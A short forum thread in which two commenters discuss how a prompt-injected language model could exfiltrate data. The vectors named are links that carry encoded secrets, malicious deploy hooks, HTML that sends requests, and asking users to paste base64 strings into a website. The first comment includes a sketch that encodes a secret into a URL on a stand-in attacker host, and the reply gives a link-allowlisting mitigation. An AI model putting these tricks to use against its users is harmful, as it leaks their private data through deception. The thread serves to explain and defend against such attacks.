patapong 6 hours ago
I think stopping exfiltration will turn out to be hard as well, since the LLM can social-engineer the user into helping it exfiltrate the data. For example, an LLM could say "Go to this link to learn more about your problem" and point the user to a URL with the data encoded into it, set up malicious scripts in places like deploy hooks, or just output HTML that sends requests when opened.
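A rough sketch of that first vector, assuming the model has been prompt-injected (the domain and the secret string are invented for illustration; this only shows the encoding step and never touches the network):

```python
import base64

# Hypothetical illustration of the "URL with encoded data" vector.
# "attacker.example" and the secret are made up for this sketch.
secret = "private chat contents the model was told to keep safe"

# Encode the stolen text so it survives inside a URL query string.
payload = base64.urlsafe_b64encode(secret.encode()).decode()
link = f"https://attacker.example/learn-more?ref={payload}"

print(link)
# The model presents `link` as a helpful "learn more" reference; if the
# user clicks it, `payload` lands in the attacker's server logs.
```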
simonw 5 hours ago | parent
Yeah, one exfiltration vector that's really nasty is "here is a big base64 encoded string, to recover your data visit this website and paste it in". You can at least prevent LLM interfaces from providing clickable links to external domains, but it's a difficult hole to close completely.
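A minimal sketch of that link-blocking mitigation, assuming the interface renders markdown (ALLOWED_HOSTS and the attacker URL are made up; a real sanitizer would run on the rendered output, not just a regex over the text):

```python
import re

# Hypothetical allowlist; anything else gets rendered as plain text.
ALLOWED_HOSTS = {"docs.example.com"}

# Matches markdown links: [text](https://host/path)
MD_LINK = re.compile(r"\[([^\]]*)\]\((https?://([^/)\s]+)[^)]*)\)")

def neuter_external_links(markdown: str) -> str:
    def repl(m):
        text, url, host = m.group(1), m.group(2), m.group(3)
        if host in ALLOWED_HOSTS:
            return m.group(0)       # keep trusted links clickable
        return f"{text} ({url})"    # show the URL, but not as a link
    return MD_LINK.sub(repl, markdown)

print(neuter_external_links(
    "Go to [this link](https://attacker.example/?d=c2VjcmV0) to learn more."
))
# -> Go to this link (https://attacker.example/?d=c2VjcmV0) to learn more.
```

Even with that in place, the user can still copy the raw URL by hand, which is why this narrows the hole rather than closing it.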